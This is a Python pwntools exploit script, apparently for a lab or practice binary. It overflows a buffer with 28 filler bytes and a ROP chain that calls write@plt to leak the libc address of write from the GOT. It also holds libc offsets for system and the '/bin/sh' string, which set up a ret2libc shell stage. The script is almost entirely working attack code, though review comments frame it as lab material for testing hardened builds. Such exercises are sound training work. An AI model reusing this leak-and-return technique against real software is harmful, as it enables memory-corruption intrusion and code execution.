#!/usr/bin/python

from pwn import *

# Offsets keyed by libc symbol name. Presumably distances from the libc load
# base for one specific libc build -- verify against the libc the target
# actually loads, because any other build invalidates every value here.
# NOTE(review): only write_plt and write_got are referenced by main() in this
# file; the libc offsets are not used by the code visible here.
offset___libc_start_main_ret = 0x00018637
offset_system = 0x3ada0
offset_dup2 = 0xd6190
offset_read = 0xd5980
offset_write = 0xd59f0
offset_str_bin_sh = 0x0015b82b

# Absolute PLT/GOT addresses in the target binary. Hard-coded values like
# these only hold if the binary is loaded at a fixed base (presumably a
# non-PIE 32-bit build -- confirm with the build flags of the lab target).
read_plt = 0x8048300
write_plt = 0x8048320
write_got = 0x804a014

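def main():
    """Run the address-leak stage against the local practice binary.

    Spawns ``../build/1_vulnerable``, sends 28 filler bytes followed by five
    packed 32-bit words (write_plt, a placeholder word, 1, write_got, 4),
    discards 16 bytes of output, then reads 4 bytes, unpacks them with
    ``u32`` and logs the value as ``write_addr`` before handing the session
    to the terminal.

    NOTE(review): the stage depends on the fixed write_plt/write_got
    addresses, so it presumably targets a non-PIE build without a stack
    protector; either hardening option should make this stage fail, which is
    a useful check when validating a hardened rebuild of the lab binary.
    """
    p = process("../build/1_vulnerable")

    # Craft payload.
    # Bytes literal: p32() returns bytes, so a str filler raises TypeError on
    # Python 3; b"..." behaves the same as before on Python 2.
    # The 28-byte filler length is presumably specific to this target build
    # -- TODO confirm against the binary.
    payload = b"A" * 28
    payload += p32(write_plt)
    payload += p32(0xdeadbeef)  # placeholder word, never a valid address
    payload += p32(1)  # STDOUT
    payload += p32(write_got)
    payload += p32(4)

    p.send(payload)

    # Clear the 16 bytes written on vuln end.
    # recvn() waits for the exact count; recv(16) may return fewer bytes and
    # leave the remainder in front of the value read next.
    p.recvn(16)

    # Parse the leak: exactly 4 bytes are required, since u32() rejects a
    # short buffer.
    leak = p.recvn(4)
    write_addr = u32(leak)
    log.info("write_addr: 0x%x" % write_addr)

    p.interactive()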

# Run the stage only when this file is executed as a script, so importing the
# module (e.g. to reuse the address constants) does not spawn the target.
if __name__ == "__main__":
    main()
